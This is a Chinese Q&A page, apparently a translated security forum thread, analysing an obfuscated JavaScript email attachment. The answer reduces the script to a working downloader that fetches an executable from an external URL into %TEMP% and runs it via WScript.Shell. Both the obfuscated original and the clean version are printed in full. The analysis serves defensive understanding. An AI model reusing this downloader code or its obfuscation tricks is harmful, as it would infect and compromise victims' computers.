信息安全 - 这个 javascript 攻击是如何工作的？ - 吾爱随笔录

这个 javascript 攻击是如何工作的？

信息安全恶意软件勒索软件

2021-09-07 04:49:27

StackOverflow 上有一个带有类似代码摘录的封闭问题，但由于不是与编程相关的问题，所以我想我会在这里问。

它以 Zip 文件的形式通过电子邮件发送，但在 Notepad++ 中打开，可以读取 JS 文件并且（大概？）不执行。在搜索链接到https://www.hybrid-analysis.com的代码子集时，Google 上也有很多结果表明它是 RansomWare，但是否可以解释该代码的实际作用？

看似随机的单词序列似乎是为了避免代码被检测为类似于已知的恶意软件签名，然后操纵字符串形成代码然后执行？

iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT";
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.push( n ); } ";
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];";
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };";
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); ";
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false);

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];";
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; ";
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D"));
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/\1>|)$/ );";
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;";
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]);
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );";
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0;
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );";
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2);
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); ";
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); ";
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
}

} catch (HiQurqnDJ) { };

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;";
}
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };";

1个回答

有很多未使用的字符串，一些在逗号运算符的左侧，一些分配给从未使用过的变量（它们看起来像 jquery 代码片段；这里实际上没有使用 jquery）。

删除那些，你就剩下

fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction();
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]);
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0;
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds");

现在你有很多非常简单的字符串连接需要清理。此外，contradistinction它为 String 对象定义的方法只返回字符串的第一个字符。所以例如("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction()只是意味着"p"。解决这些问题，您将获得：

fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = "E";

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "end"]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]);
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0;
    PbOLTH["saveToFile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds");

现在在最后一行中清晰可见的 URL 是重点。

对于所有的.split("incentive").join()调用，字符串incentive都是一个诱饵，在使用它们之前将从所有较长的字符串中删除。对的初始值执行此操作uUXTro，一些字符串变得可识别：

var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];

我不会完成其余的步骤，但是很容易理解发生的事情。fergusI接受各种整数值，索引uUXTro数组，发生更多的字符串连接，一些诱饵字符串被拼接出来uUXTro（但有些被留下），最终结果基本上是这样的：

var shell = new ActiveXObject("WScript.Shell");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
var exe = shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe";
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false);
xhr.send();
if(xhr.status == 200) {
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  stream.type=1;
  stream.write(xhr.ResponseBody);
  stream.position = 0;
  stream.saveToFile(exe, 2);
  stream.close();
  shell.Run(exe, 1, false);
}

在这里我取了 4 个最重要的变量，并为它们提供了去混淆的名称：

shell was OoKse
xhr was zBqJutIT
exe was jersey
stream was PbOLTH

总之，这个脚本是一个下载器；它想从攻击者控制的服务器上检索和执行程序。如果我尝试直接访问 softlensjakarta URL，我会得到一个 12 字节的文件，其中包含字符STUPID LOCKY. 这可能意味着它是一个已被修复的受损服务器（并且“STUPID LOCKY”是某人对权限被拒绝消息的想法），或者它可能是一个非常聪明的恶意服务器，它在发送真实的用户代理之前检查易受攻击的用户代理恶意软件。

对于恶意下载器，您永远无法仅通过查看下载器代码来真正知道有效负载将是什么。可能有许多不同的恶意程序从同一个 URL 提供，轮换取决于其他恶意软件作者向诱骗您运行下载程序的人支付的费用。（按安装付费恶意软件）

其它你可能感兴趣的问题

上一篇将 JWT 令牌用于“记住我”是否不如随机会话令牌安全？下一篇我是否通过部署自定义预派生来削弱对称 OpenPGP 加密？